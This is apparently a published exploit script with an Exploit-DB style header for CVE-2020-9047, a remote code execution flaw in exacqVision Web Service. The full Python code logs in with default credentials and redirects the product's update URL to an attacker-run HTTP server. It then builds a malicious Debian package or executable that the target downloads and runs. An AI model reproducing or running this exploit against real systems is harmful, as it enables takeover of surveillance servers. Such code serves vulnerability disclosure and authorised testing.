README.md
Rendering markdown...
# Exploit Title: exacqVision Web Service 3.8.2.67295 - 20.06.3.0 - Remote Code Execution
# Date: 2020-07-13
# Exploit Author: Michael W. Norris
# Technical Details: https://mnorris.io/research/CVE-2020-9047/
# Vendor Homepage: https://www.exacq.com/
# Software Link: https://www.exacq.com/support/downloads.php
# Tested On: exacqVision Web Service 3.8.2.67295 - 20.06.3.0
# CVE: CVE-2020-9047
# Source PoC: https://github.com/norrismw/CVE-2020-9047
#!/usr/bin/python3
import argparse, hashlib, http.server, json, os ,requests, shutil, socketserver, subprocess, sys, tempfile, threading, time
description = 'Exploit for exacqVision Web Service as outlined in CVE-2020-9047. This program targets Windows and Linux x86 installations '
description += 'of exacqVision Web Service versions 3.8.2.67295 - 20.06.3.0. Written by Michael W. Norris.'
parser = argparse.ArgumentParser(description=description)
help_arg = 'The target operating system. Provide "WINDOWS" for Windows, "LINUX" for Linux, or "CHECK" to have this program perform a check. '
help_arg+= 'When using "CHECK", \'\' can be provided for the LHOST and PAYLOAD arguments.'
parser.add_argument('TARGET', choices={'WINDOWS', 'LINUX', 'CHECK'}, help=help_arg)
parser.add_argument('RHOST', help='The IP address of the remote host; the IP address of the target.')
help_arg = 'The port on the remote host where exacqVision Web Service is running. Default: 80'
parser.add_argument('-p', metavar='RPORT', type=int, default=80, help=help_arg)
help_arg = 'The local IP address that will serve the payload for the remote host. This should not be "localhost" or "127.0.0.1". '
help_arg += 'The remote host will need to be able to connect to the provided IP address. This program should be run on the system with '
help_arg += 'the specified IP address.'
parser.add_argument('LHOST', help=help_arg)
help_arg = 'The local port that will be used to serve the payload file for the remote host. Default: 8000'
parser.add_argument('-s', metavar='LPORT', type=int, default=8000, help=help_arg)
help_arg = 'The absolute file path of an existing Windows executable (.exe) or Linux binary file on the local system. The binary will be '
help_arg += 'executed on the remote host. If the --command flag is set and "LINUX" was provided as the TARGET argument, enter a command '
help_arg += 'that will be executed on the remote host.'
parser.add_argument('PAYLOAD', help=help_arg)
help_arg = 'Sets the command flag. The flag allows for a command to be provided as the PAYLOAD argument instead of a file path to a binary. '
help_arg += ' The provided command will be executed on the remote host. The flag should be set only if "LINUX" was provided as the TARGET '
help_arg += 'argument.'
parser.add_argument('--command', default=False, action='store_true', help=help_arg)
help_arg = 'The local existing directory where a randomly named temporary directory will be created. Default: /tmp'
parser.add_argument('-d', metavar='WEBDIR', default='/tmp', help=help_arg)
help_arg = 'The username for authenticating to the remote exacqVision Web Service application. Default: admin'
parser.add_argument('-U', metavar='USERNAME', default='admin', help=help_arg)
help_arg = 'The password for authenticating to the remote exacqVision Web Service application. Default: admin256'
parser.add_argument('-P', metavar='PASSWORD', default='admin256', help=help_arg)
args = parser.parse_args()
system = args.TARGET
rhost = args.RHOST
rport = args.p
lhost = args.LHOST
lport = args.s
payload = args.PAYLOAD
command_flag = args.command
temp_dir = tempfile.mkdtemp(dir = args.d)
username = args.U
password = args.P
class GenPayload:
random_infofile = next(tempfile._get_candidate_names())
random_payload = next(tempfile._get_candidate_names()).replace('_', '')
server_url = 'http://%s:%s/%s' % (lhost, lport, random_infofile)
def __init__(self):
if system == 'LINUX':
self.package_dir ='/'+self.random_payload
self.debian_dir = '/DEBIAN'
os.makedirs(temp_dir+self.package_dir+self.debian_dir)
if not command_flag:
self.ptmp_dir = '/tmp'
os.makedirs(temp_dir+self.package_dir+self.ptmp_dir)
if system == 'WINDOWS' and command_flag:
parser.print_help()
sys.exit()
def copy_payload(self):
if system == 'LINUX' and not command_flag:
shutil.copyfile(payload, temp_dir+self.package_dir+self.ptmp_dir+'/'+self.random_payload)
else:
shutil.copyfile(payload, temp_dir+'/'+self.random_payload+'.exe')
def generate_control(self):
file_path = temp_dir+self.package_dir+self.debian_dir
content = 'Package: {random}\nVersion: 99.99.99.9999\nArchitecture: all\n'
content += 'Maintainer: {random}\nDescription: {random}\n'
content = content.format(random = self.random_payload)
control = open(file_path+'/control','w')
control.write(content)
control.close()
def generate_postinst(self):
file_path = temp_dir+self.package_dir+self.debian_dir
if command_flag:
content = '#!/bin/bash\nservice webservice start\nservice evapache restart\n'
content += 'service wfe start\nsystemctl restart webservice\nsystemctl restart wfe\n'
content += '%s &' % (payload)
else:
content = '#!/bin/bash\nservice webservice start\nservice evapache restart\n'
content += 'service wfe start\nsystemctl restart webservice\nsystemctl restart wfe\n'
content += 'chmod 2755 /tmp/{random} && /tmp/{random} &'
content = content.format(random = self.random_payload)
postinst = open(file_path+'/postinst','w')
postinst.write(content)
postinst.close()
os.chmod(file_path+'/postinst', 0o0755)
def build_package(self):
file_path = temp_dir+self.package_dir
f_null = open(os.devnull, 'w')
try:
subprocess.run(['/usr/bin/dpkg-deb', '-Zgzip', '--build', '%s' % file_path], stdout=f_null)
except FileNotFoundError:
print('Just kidding. It appears that /usr/bin/dpkg-deb is not available on this system')
GenPayload.cleanup(temp_dir)
sys.exit()
shutil.rmtree(temp_dir+self.package_dir)
def package_md5sum(self):
target_file = open(self, 'rb')
content = target_file.read()
md5_hash = hashlib.md5()
md5_hash.update(content)
digest = md5_hash.hexdigest()
return digest
def generate_fileinfo(self):
if system == 'LINUX':
sys = 'Linux'
ext = 'deb'
f = self.random_payload+'.deb'
target_file = (temp_dir+'/'+self.random_payload+'.deb')
else:
sys = 'Windows'
ext = 'exe'
f = self.random_payload+'.exe'
target_file = (temp_dir+'/'+self.random_payload+'.exe')
md5sum = GenPayload.package_md5sum(target_file)
info_file = (temp_dir+'/'+ self.random_infofile)
content = "[ev-WebService-{os}-x64-99.99.99.9999]\nVersion=99.99.99.9999\nDate=12-31-9999\nDownloadable=True\n"
content += "Link=http://{lh}:{lp}/{file}\nPackage={os}-x64\nProduct=webservice\n"
content += "Filesize={fs}\nChecksumType=md5\nChecksumHash={md5}\nStatus=Recommended\nExtension={ext}\n\n"
content += "[ev-WebService-{os}-99.99.99.9999]\nVersion=99.99.99.9999\nDate=12-31-9999\nDownloadable=True\n"
content += "Link=http://{lh}:{lp}/{file}\nPackage={os}\nProduct=webservice\n"
content += "Filesize={fs}\nChecksumType=md5\nChecksumHash={md5}\nStatus=Recommended\nExtension={ext}\n"
content = content.format(os = sys, lh = lhost, lp = lport, file = f, fs = os.path.getsize(target_file), md5 = md5sum, ext = ext)
file_info = open(info_file,'w')
file_info.write(content)
file_info.close()
return self.random_infofile
def cleanup(self):
print('\nRemoving temporary directory structure %s' % temp_dir)
shutil.rmtree(temp_dir)
print('Stopping HTTP server on 0.0.0.0:%s' % lport)
time.sleep(1)
class InteractRemote:
vuln_versions = ['3.10.4.72058', '3.12.4.76544', '3.8.2.67295', '7.0.2.81005', '7.2.7.86974', '7.4.3.89785', '7.6.4.94391']
vuln_versions += ['7.8.2.97826', '8.0.6.105408', '8.2.2.107285', '8.4.3.111614', '8.6.3.116175', '8.8.1.118913', '9.0.3.124620' ]
vuln_versions += ['9.2.0.127940', '9.4.3.137684', '9.6.7.145949', '9.8.4.149166', '19.03.3.152166', '19.06.4.157118']
vuln_versions += ['19.09.4.0', '19.12.2.0', '20.03.2.0', '20.06.3.0']
def __init__(self):
self.target = '%s:%s' % (rhost, rport)
self.http_target = 'http://'+self.target
self.server_url = GenPayload.server_url
self.default_url = 'http://www.exacq.com/downloads/evFileInfo.txt'
def vuln_check(self):
try:
version = requests.get(self.http_target+'/version.web').text
time.sleep(1)
except (ConnectionRefusedError, OSError, TimeoutError):
print('Failed to connect to the target: %s' % self.target)
print('Is the target correct?')
sys.exit()
if version in self.vuln_versions[7:]:
target_info = requests.get(self.http_target+'/health.web')
json_info = json.loads(target_info.text)
tar_system = json_info['os']['system']
processor = json_info['os']['processor']
print('Target OS: %s %s' % (tar_system, processor))
print('EVWS Version: %s\n' % version)
if tar_system.lower() == 'linux' or tar_system.lower() == 'windows':
if system == 'CHECK':
print('Exploitable: YES')
print('Specify "%s" as the TARGET argument and provide a relevant PAYLOAD argument' % tar_system.upper())
return True
try:
if system == tar_system.upper():
print('Exploitable: YES')
if system == 'LINUX' and not command_flag:
print('Confirm the specified PAYLOAD is compatible with the remote architecture')
else:
print('The provided command will be executed on the remote system')
cont_var = input('Press ENTER to continue or CTRL+C to exit\n')
if cont_var == '':
return True
else:
sys.exit()
else:
print('Eploitable: YES')
print('... but the provided TARGET argument does not match the remote operating system')
print('Specify "%s" as the TARGET argument and provide a relevant PAYLOAD argument' % tar_system.upper())
sys.exit()
except KeyboardInterrupt:
print('')
sys.exit()
if version in self.vuln_versions[:7]:
print('Target OS: Unable to automatically determine target OS/architecture')
print('EVWS Version: %s\n' % version)
if system == 'CHECK':
print('Exploitable: UNKNOWN')
print('Manually determine the operating system/architecture of the remote system')
return True
try:
print('Exploitable: YES')
if system == 'LINUX' and command_flag:
print('... but only if the provided TARGET argument is accurate\n')
print('... but only if the provided TARGET and PAYLOAD arguments are accurate/relevant')
cont_var = input('Press ENTER to try or CTRL+C to exit\n')
if cont_var == '':
return True
else:
sys.exit()
except KeyboardInterrupt:
print('')
sys.exit()
else:
print('Exploitable: NO')
print('Target %s is not vulnerable and/or this program will not work on the target.' % self.target)
sys.exit()
def authenticate(self):
auth_check = requests.post(self.http_target+'/service.web', data = {'action':'login', 'u':username, 'p':password})
result = json.loads(auth_check.text)['success']
time.sleep(1)
if result:
auth_token = json.loads(auth_check.text)['auth']
return auth_token
else:
print('Failed to authenticate due to invalid credentials')
sys.exit()
def change_url(self, auth_token, default=False):
if not default:
req_data = {'auth':auth_token, 'url':self.server_url, 'timeout':'10'}
change_update = requests.post(self.http_target+'/service.web/updates', data = req_data)
else:
req_data = {'auth':auth_token, 'url':self.default_url, 'timeout':'10'}
change_update = requests.post(self.http_target+'/service.web/updates', data = req_data)
result = json.loads(change_update.text)['success']
time.sleep(2)
return result
def check_updates(self, auth_token):
update_check = requests.get(self.http_target+'/service.web?auth=%s&action=updatecheck&updates_file=%s' % (auth_token, self.server_url))
time.sleep(2)
def download_update(self, auth_token):
req_data = {'auth':auth_token, 'action':'downloadupdate', 'version':'99.99.99.9999'}
download = requests.post(self.http_target+'/service.web', data = req_data)
status = requests.get(self.http_target+'/service.web?auth=%s&action=downloadupdatestatus&version=99.99.99.9999' % (auth_token))
time.sleep(2)
status = requests.get(self.http_target+'/service.web?auth=%s&action=downloadupdatestatus&version=99.99.99.9999' % (auth_token))
while json.loads(status.text)['current_file_size'] != json.loads(status.text)['total_file_size']:
print('\nWaiting for download to complete.')
time.sleep(1)
status = requests.get(self.http_target+'/service.web?auth=%s&action=downloadupdatestatus&version=99.99.99.9999' % (auth_token))
req_data = {'auth':auth_token, 'action':'update', 'version':'99.99.99.9999'}
update = requests.post(self.http_target+'/service.web', data = req_data)
result = json.loads(update.text)['success']
if result:
return True
else:
print('\nThe target was unable to download the payload from %s' % self.server_url)
GenPayload.cleanup(temp_dir)
sys.exit()
def temporary_server(self):
print('Starting HTTP server on 0.0.0.0:%s' % lport)
print('Serving payload from %s directory\n' % temp_dir)
handler = http.server.SimpleHTTPRequestHandler
os.chdir(temp_dir)
httpd = socketserver.TCPServer(('', lport), handler)
httpd.serve_forever()
def server_thread(self):
server_thread = threading.Thread(target=self.temporary_server)
server_thread.daemon = True
server_thread.start()
time.sleep(1)
if __name__ == '__main__':
w = InteractRemote()
x = GenPayload()
if system == 'CHECK':
w.vuln_check()
sys.exit()
else:
y = w.vuln_check()
z = w.authenticate()
if system == 'LINUX':
x.generate_control()
if not command_flag:
x.copy_payload()
x.generate_postinst()
x.build_package()
else:
x.copy_payload()
x.generate_fileinfo()
w.server_thread()
if y in InteractRemote.vuln_versions[7:]:
w.change_url(z)
w.check_updates(z)
w.change_url(z, default=True)
w.download_update(z)
else:
w.check_updates(z)
w.download_update(z)
x.cleanup()
sys.exit()